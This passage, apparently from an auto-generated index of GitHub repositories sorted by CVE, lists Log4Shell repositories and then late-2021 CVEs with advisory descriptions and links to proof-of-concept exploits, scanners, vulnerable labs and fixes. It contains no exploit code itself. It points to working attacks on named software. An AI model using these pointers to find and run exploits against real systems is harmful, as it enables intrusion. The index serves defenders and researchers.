- [Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE](https://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE)
- [rohan-flutterint/CVE-2021-44228_scanner](https://github.com/rohan-flutterint/CVE-2021-44228_scanner)
- [sysadmin0815/Fix-Log4j-PowershellScript](https://github.com/sysadmin0815/Fix-Log4j-PowershellScript)
- [RenYuH/log4j-lookups-vulnerability](https://github.com/RenYuH/log4j-lookups-vulnerability)
- [scheibling/py-log4shellscanner](https://github.com/scheibling/py-log4shellscanner)
- [zaneef/CVE-2021-44228](https://github.com/zaneef/CVE-2021-44228)
- [metodidavidovic/log4j-quick-scan](https://github.com/metodidavidovic/log4j-quick-scan)
- [WatchGuard-Threat-Lab/log4shell-iocs](https://github.com/WatchGuard-Threat-Lab/log4shell-iocs)
- [Aschen/log4j-patched](https://github.com/Aschen/log4j-patched)
- [Nikolas-Charalambidis/cve-2021-44228](https://github.com/Nikolas-Charalambidis/cve-2021-44228)
- [m0rath/detect-log4j-exploitable](https://github.com/m0rath/detect-log4j-exploitable)
- [nu11secur1ty/CVE-2021-44228-VULN-APP](https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP)
- [ankur-katiyar/log4j-docker](https://github.com/ankur-katiyar/log4j-docker)
- [immunityinc/Log4j-JNDIServer](https://github.com/immunityinc/Log4j-JNDIServer)
- [DANSI/PowerShell-Log4J-Scanner](https://github.com/DANSI/PowerShell-Log4J-Scanner)
- [suniastar/scan-log4shell](https://github.com/suniastar/scan-log4shell)
- [shivakumarjayaraman/log4jvulnerability-CVE-2021-44228](https://github.com/shivakumarjayaraman/log4jvulnerability-CVE-2021-44228)
- [j3kz/CVE-2021-44228-PoC](https://github.com/j3kz/CVE-2021-44228-PoC)
- [Apipia/log4j-pcap-activity](https://github.com/Apipia/log4j-pcap-activity)
- [axelcurmi/log4shell-docker-lab](https://github.com/axelcurmi/log4shell-docker-lab)
- [otaviokr/log4j-2021-vulnerability-study](https://github.com/otaviokr/log4j-2021-vulnerability-study)
- [kkyehit/log4j_CVE-2021-44228](https://github.com/kkyehit/log4j_CVE-2021-44228)
- [trickyearlobe/inspec-log4j](https://github.com/trickyearlobe/inspec-log4j)
- [TheInterception/Log4J-Simulation-Tool](https://github.com/TheInterception/Log4J-Simulation-Tool)
- [KeysAU/Get-log4j-Windows-local](https://github.com/KeysAU/Get-log4j-Windows-local)
- [mschmnet/Log4Shell-demo](https://github.com/mschmnet/Log4Shell-demo)
- [Rk-000/Log4j_scan_Advance](https://github.com/Rk-000/Log4j_scan_Advance)
- [puzzlepeaches/Log4jCenter](https://github.com/puzzlepeaches/Log4jCenter)
- [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc)
- [TotallyNotAHaxxer/f-for-java](https://github.com/TotallyNotAHaxxer/f-for-java)
- [spasam/log4j2-exploit](https://github.com/spasam/log4j2-exploit)
- [bumheehan/cve-2021-44228-log4j-test](https://github.com/bumheehan/cve-2021-44228-log4j-test)
- [cergo123/log4j-dork-scanner](https://github.com/cergo123/log4j-dork-scanner)
- [dmitsuo/log4shell-war-fixer](https://github.com/dmitsuo/log4shell-war-fixer)
- [Y0-kan/Log4jShell-Scan](https://github.com/Y0-kan/Log4jShell-Scan)
- [julian911015/Log4j-Scanner-Exploit](https://github.com/julian911015/Log4j-Scanner-Exploit)
- [intel-xeon/CVE-2021-44228---detection-with-PowerShell](https://github.com/intel-xeon/CVE-2021-44228---detection-with-PowerShell)
- [chandru-gunasekaran/log4j-fix-CVE-2021-44228](https://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228)
- [erickrr-bd/TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp)
- [snapattack/damn-vulnerable-log4j-app](https://github.com/snapattack/damn-vulnerable-log4j-app)
- [sassoftware/loguccino](https://github.com/sassoftware/loguccino)
- [xx-zhang/apache-log4j2-CVE-2021-44228](https://github.com/xx-zhang/apache-log4j2-CVE-2021-44228)
- [r00thunter/Log4Shell-Scanner](https://github.com/r00thunter/Log4Shell-Scanner)
- [mn-io/log4j-spring-vuln-poc](https://github.com/mn-io/log4j-spring-vuln-poc)
- [rejupillai/log4j2-hack-springboot](https://github.com/rejupillai/log4j2-hack-springboot)
- [lucab85/log4j-cve-2021-44228](https://github.com/lucab85/log4j-cve-2021-44228)
- [BabooPan/Log4Shell-CVE-2021-44228-Demo](https://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo)
- [ossie-git/log4shell_sentinel](https://github.com/ossie-git/log4shell_sentinel)
- [r00thunter/Log4Shell](https://github.com/r00thunter/Log4Shell)
- [asyzdykov/cve-2021-44228-fix-jars](https://github.com/asyzdykov/cve-2021-44228-fix-jars)
- [BJLIYANLIANG/log4j-scanner](https://github.com/BJLIYANLIANG/log4j-scanner)
- [badb33f/Apache-Log4j-POC](https://github.com/badb33f/Apache-Log4j-POC)
- [TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit](https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit)
- [lucab85/ansible-role-log4shell](https://github.com/lucab85/ansible-role-log4shell)
- [grimch/log4j-CVE-2021-44228-workaround](https://github.com/grimch/log4j-CVE-2021-44228-workaround)
- [cybersecurityworks553/log4j-shell-csw](https://github.com/cybersecurityworks553/log4j-shell-csw)
- [Toolsec/log4j-scan](https://github.com/Toolsec/log4j-scan)
- [puzzlepeaches/Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi)
- [many-fac3d-g0d/apache-tomcat-log4j](https://github.com/many-fac3d-g0d/apache-tomcat-log4j)
- [marcourbano/CVE-2021-44228](https://github.com/marcourbano/CVE-2021-44228)
- [bsigouin/log4shell-vulnerable-app](https://github.com/bsigouin/log4shell-vulnerable-app)
- [ToxicEnvelope/XSYS-Log4J2Shell-Ex](https://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex)
- [felipe8398/ModSec-log4j2](https://github.com/felipe8398/ModSec-log4j2)
- [ceyhuncamli/Log4j_Attacker_IPList](https://github.com/ceyhuncamli/Log4j_Attacker_IPList)
- [mazhar-hassan/log4j-vulnerability](https://github.com/mazhar-hassan/log4j-vulnerability)
- [xungzzz/VTI-IOCs-CVE-2021-44228](https://github.com/xungzzz/VTI-IOCs-CVE-2021-44228)
- [s-retlaw/l4s_poc](https://github.com/s-retlaw/l4s_poc)
- [Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main](https://github.com/Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main)
- [yesspider-hacker/log4j-payload-generator](https://github.com/yesspider-hacker/log4j-payload-generator)
- [LinkMJB/log4shell_scanner](https://github.com/LinkMJB/log4shell_scanner)
- [NS-Sp4ce/Vm4J](https://github.com/NS-Sp4ce/Vm4J)
- [PoneyClairDeLune/LogJackFix](https://github.com/PoneyClairDeLune/LogJackFix)
- [MarceloLeite2604/log4j-vulnerability](https://github.com/MarceloLeite2604/log4j-vulnerability)
- [romanutti/log4shell-vulnerable-app](https://github.com/romanutti/log4shell-vulnerable-app)
- [mklinkj/log4j2-test](https://github.com/mklinkj/log4j2-test)
- [4jfinder/4jfinder.github.io](https://github.com/4jfinder/4jfinder.github.io)
- [alexpena5635/CVE-2021-44228_scanner-main-Modified-](https://github.com/alexpena5635/CVE-2021-44228_scanner-main-Modified-)
- [ChandanShastri/Log4j_Vulnerability_Demo](https://github.com/ChandanShastri/Log4j_Vulnerability_Demo)
- [puzzlepeaches/Log4jHorizon](https://github.com/puzzlepeaches/Log4jHorizon)
- [Vulnmachines/log4jshell_CVE-2021-44228](https://github.com/Vulnmachines/log4jshell_CVE-2021-44228)
- [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer)
- [nix-xin/vuln4japi](https://github.com/nix-xin/vuln4japi)
- [maximofernandezriera/CVE-2021-44228](https://github.com/maximofernandezriera/CVE-2021-44228)
- [mebibite/log4jhound](https://github.com/mebibite/log4jhound)
- [jxerome/log4shell](https://github.com/jxerome/log4shell)
- [solitarysp/Log4j-CVE-2021-44228](https://github.com/solitarysp/Log4j-CVE-2021-44228)
- [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository)
- [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD)
- [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin)
- [arnaudluti/PS-CVE-2021-44228](https://github.com/arnaudluti/PS-CVE-2021-44228)
- [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC)
- [robrankin/cve-2021-44228-waf-tests](https://github.com/robrankin/cve-2021-44228-waf-tests)
- [0xalwayslucky/log4j-polkit-poc](https://github.com/0xalwayslucky/log4j-polkit-poc)
- [y-security/yLog4j](https://github.com/y-security/yLog4j)
- [FeryaelJustice/Log4Shell](https://github.com/FeryaelJustice/Log4Shell)
- [hotpotcookie/CVE-2021-44228-white-box](https://github.com/hotpotcookie/CVE-2021-44228-white-box)
- [s-retlaw/l4srs](https://github.com/s-retlaw/l4srs)
- [Ananya-0306/Log-4j-scanner](https://github.com/Ananya-0306/Log-4j-scanner)
- [paulvkitor/log4shellwithlog4j2_13_3](https://github.com/paulvkitor/log4shellwithlog4j2_13_3)
- [MiguelM001/vulescanjndilookup](https://github.com/MiguelM001/vulescanjndilookup)
- [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228)
- [honypot/CVE-2021-44228](https://github.com/honypot/CVE-2021-44228)
- [honypot/CVE-2021-44228-vuln-app](https://github.com/honypot/CVE-2021-44228-vuln-app)
- [manishkanyal/log4j-scanner](https://github.com/manishkanyal/log4j-scanner)
- [TPower2112/Writing-Sample-1](https://github.com/TPower2112/Writing-Sample-1)
- [Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228](https://github.com/Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228)
- [r3kind1e/Log4Shell-obfuscated-payloads-generator](https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator)
- [Phineas09/CVE-2021-44228](https://github.com/Phineas09/CVE-2021-44228)
- [yuuki1967/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/yuuki1967/CVE-2021-44228-Apache-Log4j-Rce)
- [moshuum/tf-log4j-aws-poc](https://github.com/moshuum/tf-log4j-aws-poc)
- [jaehnri/CVE-2021-44228](https://github.com/jaehnri/CVE-2021-44228)
- [ra890927/Log4Shell-CVE-2021-44228-Demo](https://github.com/ra890927/Log4Shell-CVE-2021-44228-Demo)
- [vidrez/Ethical-Hacking-Report-Log4j](https://github.com/vidrez/Ethical-Hacking-Report-Log4j)
- [vino-theva/CVE-2021-44228](https://github.com/vino-theva/CVE-2021-44228)
- [tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228)
- [eurogig/jankybank](https://github.com/eurogig/jankybank)
- [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation)
- [ocastel/log4j-shell-poc](https://github.com/ocastel/log4j-shell-poc)
- [bcdunbar/CVE-2021-44228-poc](https://github.com/bcdunbar/CVE-2021-44228-poc)
- [srcporter/CVE-2021-44228](https://github.com/srcporter/CVE-2021-44228)
- [Nexolanta/log4j2_CVE-2021-44228](https://github.com/Nexolanta/log4j2_CVE-2021-44228)
- [demining/Log4j-Vulnerability](https://github.com/demining/Log4j-Vulnerability)
- [pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC](https://github.com/pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC)
- [Sma-Das/Log4j-PoC](https://github.com/Sma-Das/Log4j-PoC)
- [53buahapel/log4shell-vulnweb](https://github.com/53buahapel/log4shell-vulnweb)
- [demonrvm/Log4ShellRemediation](https://github.com/demonrvm/Log4ShellRemediation)
- [funcid/log4j-exploit-fork-bomb](https://github.com/funcid/log4j-exploit-fork-bomb)
- [MrHarshvardhan/PY-Log4j-RCE-Scanner](https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner)
- [Muhammad-Ali007/Log4j_CVE-2021-44228](https://github.com/Muhammad-Ali007/Log4j_CVE-2021-44228)
- [Tai-e/CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228)
- [LucasPDiniz/CVE-2021-44228](https://github.com/LucasPDiniz/CVE-2021-44228)
- [felixslama/log4shell-minecraft-demo](https://github.com/felixslama/log4shell-minecraft-demo)
- [ShlomiRex/log4shell_lab](https://github.com/ShlomiRex/log4shell_lab)
- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
- [scabench/l4j-tp1](https://github.com/scabench/l4j-tp1)
- [scabench/l4j-fp1](https://github.com/scabench/l4j-fp1)
- [KtokKawu/l4s-vulnapp](https://github.com/KtokKawu/l4s-vulnapp)
- [sec13b/CVE-2021-44228-POC](https://github.com/sec13b/CVE-2021-44228-POC)
- [KirkDJohnson/Wireshark](https://github.com/KirkDJohnson/Wireshark)
- [YangHyperData/LOGJ4_PocShell_CVE-2021-44228](https://github.com/YangHyperData/LOGJ4_PocShell_CVE-2021-44228)
- [Hoanle396/CVE-2021-44228-demo](https://github.com/Hoanle396/CVE-2021-44228-demo)
- [tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment](https://github.com/tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment)
- [asd58584388/CVE-2021-44228](https://github.com/asd58584388/CVE-2021-44228)
- [OtisSymbos/CVE-2021-44228-Log4Shell-](https://github.com/OtisSymbos/CVE-2021-44228-Log4Shell-)
- [safeer-accuknox/log4j-shell-poc](https://github.com/safeer-accuknox/log4j-shell-poc)
- [Carlos-Mesquita/TPASLog4ShellPoC](https://github.com/Carlos-Mesquita/TPASLog4ShellPoC)

### CVE-2021-44255 (2022-01-31)

Authenticated remote code execution in MotionEye <= 0.42.1 and MotionEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious Python pickle file, which will execute arbitrary code on the server.

- [pizza-power/motioneye-authenticated-RCE](https://github.com/pizza-power/motioneye-authenticated-RCE)

### CVE-2021-44270
- [pinpinsec/CVE-2021-44270](https://github.com/pinpinsec/CVE-2021-44270)

### CVE-2021-44428 (2021-11-29)

Pinkie 2.15 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1.

- [z3bul0n/log4jtest](https://github.com/z3bul0n/log4jtest)

### CVE-2021-44521 (2022-02-11)

When running Apache Cassandra with the following configuration: `enable_user_defined_functions: true`, `enable_scripted_user_defined_functions: true`, `enable_user_defined_functions_threads: false`, it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.

- [WoodenKlaas/CVE-2021-44521](https://github.com/WoodenKlaas/CVE-2021-44521)
- [Yeyvo/poc-CVE-2021-44521](https://github.com/Yeyvo/poc-CVE-2021-44521)

### CVE-2021-44529 (2021-12-08)

A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).

- [jkana/CVE-2021-44529](https://github.com/jkana/CVE-2021-44529)
- [jax7sec/CVE-2021-44529](https://github.com/jax7sec/CVE-2021-44529)

### CVE-2021-44582 (2022-06-10)

A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.

- [warmachine-57/CVE-2021-44582](https://github.com/warmachine-57/CVE-2021-44582)

### CVE-2021-44593 (2022-01-21)

Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on /admin/login.php.

- [Mister-Joe/CVE-2021-44593](https://github.com/Mister-Joe/CVE-2021-44593)

### CVE-2021-44731 (2022-02-17)

A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code, and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1.

- [deeexcee-io/CVE-2021-44731-snap-confine-SUID](https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID)

### CVE-2021-44733 (2021-12-22)

A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object.

- [pjlantz/optee-qemu](https://github.com/pjlantz/optee-qemu)

### CVE-2021-44790 (2021-12-20)

A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerability, though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

- [nuPacaChi/-CVE-2021-44790](https://github.com/nuPacaChi/-CVE-2021-44790)

### CVE-2021-44827 (2022-03-04)

There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices via the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.

- [full-disclosure/CVE-2021-44827](https://github.com/full-disclosure/CVE-2021-44827)

### CVE-2021-44832 (2021-12-28)

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

- [cckuailong/log4j_RCE_CVE-2021-44832](https://github.com/cckuailong/log4j_RCE_CVE-2021-44832)
- [name/log4j-scanner](https://github.com/name/log4j-scanner)

### CVE-2021-44852 (2022-01-01)

An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.

- [CrackerCat/CVE-2021-44852](https://github.com/CrackerCat/CVE-2021-44852)

### CVE-2021-44906 (2022-03-17)

Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).

- [nevermoe/CVE-2021-44906](https://github.com/nevermoe/CVE-2021-44906)

### CVE-2021-44909
- [g1thub3r1st4/CVE-2021-44909](https://github.com/g1thub3r1st4/CVE-2021-44909)

### CVE-2021-44910
- [W000i/CVE-2021-44910_SpringBlade](https://github.com/W000i/CVE-2021-44910_SpringBlade)

### CVE-2021-45007 (2022-02-20)

Plesk 18.0.37 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows an attacker to insert data on the user and admin panel. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users.

- [AS4mir/CVE-2021-45007](https://github.com/AS4mir/CVE-2021-45007)

### CVE-2021-45008 (2022-02-21)

Plesk CMS 18.0.37 is affected by an insecure permissions vulnerability that allows privilege escalation from user to admin rights. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users.

- [AS4mir/CVE-2021-45008](https://github.com/AS4mir/CVE-2021-45008)

### CVE-2021-45010 (2022-03-15)

A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.

- [febinrev/CVE-2021-45010-TinyFileManager-Exploit](https://github.com/febinrev/CVE-2021-45010-TinyFileManager-Exploit)
- [BKreisel/CVE-2021-45010](https://github.com/BKreisel/CVE-2021-45010)
- [Syd-SydneyJr/CVE-2021-45010](https://github.com/Syd-SydneyJr/CVE-2021-45010)

### CVE-2021-45026 (2022-06-17)

ASG Technologies ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to Cross Site Scripting (XSS).

- [JetP1ane/Zena-CVE-2021-45026](https://github.com/JetP1ane/Zena-CVE-2021-45026)

### CVE-2021-45041 (2021-12-19)

SuiteCRM before 7.12.2 and 8.x before 8.0.1 allows authenticated SQL injection via the Tooltips action in the Project module, involving resource_id and start_date.

- [manuelz120/CVE-2021-45041](https://github.com/manuelz120/CVE-2021-45041)

### CVE-2021-45043 (2021-12-15)

HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.

- [crypt0g30rgy/cve-2021-45043](https://github.com/crypt0g30rgy/cve-2021-45043)

### CVE-2021-45046 (2021-12-14)

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

- [cckuailong/Log4j_CVE-2021-45046](https://github.com/cckuailong/Log4j_CVE-2021-45046)
- [BobTheShoplifter/CVE-2021-45046-Info](https://github.com/BobTheShoplifter/CVE-2021-45046-Info)
- [tejas-nagchandi/CVE-2021-45046](https://github.com/tejas-nagchandi/CVE-2021-45046)
- [pravin-pp/log4j2-CVE-2021-45046](https://github.com/pravin-pp/log4j2-CVE-2021-45046)
- [mergebase/log4j-samples](https://github.com/mergebase/log4j-samples)
- [lukepasek/log4jjndilookupremove](https://github.com/lukepasek/log4jjndilookupremove)
- [ludy-dev/cve-2021-45046](https://github.com/ludy-dev/cve-2021-45046)
- [lijiejie/log4j2_vul_local_scanner](https://github.com/lijiejie/log4j2_vul_local_scanner)
- [CaptanMoss/Log4Shell-Sandbox-Signature](https://github.com/CaptanMoss/Log4Shell-Sandbox-Signature)
- [shaily29-eng/CyberSecurity_CVE-2021-45046](https://github.com/shaily29-eng/CyberSecurity_CVE-2021-45046)

### CVE-2021-45067 (2022-01-14)

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Access of Memory Location After End of Buffer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [hacksysteam/CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)

### CVE-2021-45105 (2021-12-18)

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.

- [cckuailong/Log4j_dos_CVE-2021-45105](https://github.com/cckuailong/Log4j_dos_CVE-2021-45105)
- [pravin-pp/log4j2-CVE-2021-45105](https://github.com/pravin-pp/log4j2-CVE-2021-45105)
- [tejas-nagchandi/CVE-2021-45105](https://github.com/tejas-nagchandi/CVE-2021-45105)
- [iAmSOScArEd/log4j2_dos_exploit](https://github.com/iAmSOScArEd/log4j2_dos_exploit)
- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105)
- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105)
- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v)
- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1)
- [name/log4j-remediation](https://github.com/name/log4j-remediation)

### CVE-2021-45232 (2021-12-27)

In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks, introducing the framework `droplet` on top of the framework `gin`. All APIs and the authentication middleware are developed on `droplet`, but some APIs directly use the interface of `gin`, thus bypassing the authentication.

- [Osyanina/westone-CVE-2021-45232-scanner](https://github.com/Osyanina/westone-CVE-2021-45232-scanner)
- [badboycxcc/CVE-2021-45232-POC](https://github.com/badboycxcc/CVE-2021-45232-POC)
- [LTiDi2000/CVE-2021-45232](https://github.com/LTiDi2000/CVE-2021-45232)
- [Ilovewomen/cve-2021-45232](https://github.com/Ilovewomen/cve-2021-45232)
- [jxpsx/CVE-2021-45232-RCE](https://github.com/jxpsx/CVE-2021-45232-RCE)
- [wuppp/cve-2021-45232-exp](https://github.com/wuppp/cve-2021-45232-exp)
- [dskho/CVE-2021-45232](https://github.com/dskho/CVE-2021-45232)
- [GYLQ/CVE-2021-45232-RCE](https://github.com/GYLQ/CVE-2021-45232-RCE)
- [fany0r/CVE-2021-45232-RCE](https://github.com/fany0r/CVE-2021-45232-RCE)
- [yggcwhat/CVE-2021-45232](https://github.com/yggcwhat/CVE-2021-45232)
- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)

### CVE-2021-45416 (2022-02-01)

Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.

- [86x/CVE-2021-45416](https://github.com/86x/CVE-2021-45416)
- [dnr6419/CVE-2021-45416](https://github.com/dnr6419/CVE-2021-45416)

### CVE-2021-45428 (2022-01-03)

TLR-2005KSH is affected by an incorrect access control vulnerability. The PUT method is enabled, so an attacker can upload arbitrary files including HTML and CGI formats.

- [projectforsix/CVE-2021-45428-Defacer](https://github.com/projectforsix/CVE-2021-45428-Defacer)

### CVE-2021-45468 (2022-01-14)

Imperva Web Application Firewall (WAF) before 2021-12-23 allows remote unauthenticated attackers to use "Content-Encoding: gzip" to evade WAF security controls and send malicious HTTP POST requests to web servers behind the WAF.

- [0xhaggis/Imperva_gzip_bypass](https://github.com/0xhaggis/Imperva_gzip_bypass)

### CVE-2021-45485 (2021-12-25)

In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses.

- [Satheesh575555/linux-4.19.72_CVE-2021-45485](https://github.com/Satheesh575555/linux-4.19.72_CVE-2021-45485)

### CVE-2021-45744 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the TAGS section in the login panel.

- [plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-45744](https://github.com/plsanu/CVE-2021-45744)

### CVE-2021-45745 (2022-01-06)

A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel.

- [plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-45745](https://github.com/plsanu/CVE-2021-45745)

### CVE-2021-45897 (2022-01-28)

SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows remote code execution.

- [manuelz120/CVE-2021-45897](https://github.com/manuelz120/CVE-2021-45897)

### CVE-2021-45901 (2022-02-10)

The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists.

- [9lyph/CVE-2021-45901](https://github.com/9lyph/CVE-2021-45901)

### CVE-2021-45960 (2022-01-01)

In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).

- [nanopathi/external_expat_AOSP10_r33_CVE-2021-45960](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-45960)
- [Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-](https://github.com/Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-)
- [hshivhare67/external_expat_v2.2.6_CVE-2021-45960](https://github.com/hshivhare67/external_expat_v2.2.6_CVE-2021-45960)

### CVE-2021-46005 (2022-01-18)

Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the vehicalorcview parameter.

- [nawed20002/CVE-2021-46005](https://github.com/nawed20002/CVE-2021-46005)

### CVE-2021-46063 (2022-02-18)

MCMS v5.2.5 was discovered to contain a Server Side Template Injection (SSTI) vulnerability via the Template Management module.

- [miguelc49/CVE-2021-46063-2](https://github.com/miguelc49/CVE-2021-46063-2)
- [miguelc49/CVE-2021-46063-1](https://github.com/miguelc49/CVE-2021-46063-1)
- [miguelc49/CVE-2021-46063-3](https://github.com/miguelc49/CVE-2021-46063-3)

### CVE-2021-46067 (2022-01-06)

In Vehicle Service Management System 1.0, an attacker can steal the cookies, leading to Full Account Takeover.

- [plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover)
- [plsanu/CVE-2021-46067](https://github.com/plsanu/CVE-2021-46067)

### CVE-2021-46068 (2022-01-06)

